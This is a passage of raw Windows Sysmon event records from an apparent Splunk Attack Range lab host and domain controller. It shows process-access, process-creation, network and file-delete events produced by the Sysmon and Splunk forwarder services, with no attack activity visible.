11:31:48.870{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223996Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:48.870{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223995Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:48.870{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223994Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:48.870{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223993Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:48.870{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223992Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:48.870{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223991Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:48.870{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1B24-6216-7C05-000000003902}3176C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223990Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:48.870{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1B24-6216-7C05-000000003902}3176C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223989Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:48.871{4F8D34B0-1B24-6216-7C05-000000003902}3176C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000223988Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:46.359{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51824-false10.0.1.12-8089- 23542300x8000000000000000224019Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:49.980{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F665E021F7F3617D03328488C1D34AEF,SHA256=2424FA4B111D80DA8FDC93F884955C29C4E170DA854AFF377C30763C2CE999E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300223Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:49.358{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F26B2D88EBD2DF633F0007C5D5345BF1,SHA256=68F881F2D3BE56EE854457596BDC2F112374FCD2FFFE37FBC594DDD6F995AD93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224018Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:49.887{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E466C7AE6EFAA5E97F6B429A2D1F78D3,SHA256=99389E46B2139D99569D5E6874D8155CFC912B43F5E0F484A33C6C754CEF250F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000224017Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:49.699{4F8D34B0-1B25-6216-7D05-000000003902}4842888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224016Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:49.371{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1B25-6216-7D05-000000003902}484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224015Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:49.371{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224014Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:49.371{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224013Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:49.371{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224012Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:49.371{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224011Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:49.371{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224010Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:49.371{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224009Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:49.371{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224008Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:49.371{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224007Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:49.371{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224006Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:49.371{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1B25-6216-7D05-000000003902}484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000224005Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:49.371{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1B25-6216-7D05-000000003902}484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000224004Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:49.372{4F8D34B0-1B25-6216-7D05-000000003902}484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000224003Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:49.136{4F8D34B0-1B24-6216-7C05-000000003902}3176752C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000224020Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:50.981{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9606CDC9383B757C2FA0F3D985FF3B1D,SHA256=63399842871F80D0977747AF79BE01545BB11B95F6E7977A8B071642FB3D2929,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300224Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:50.391{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 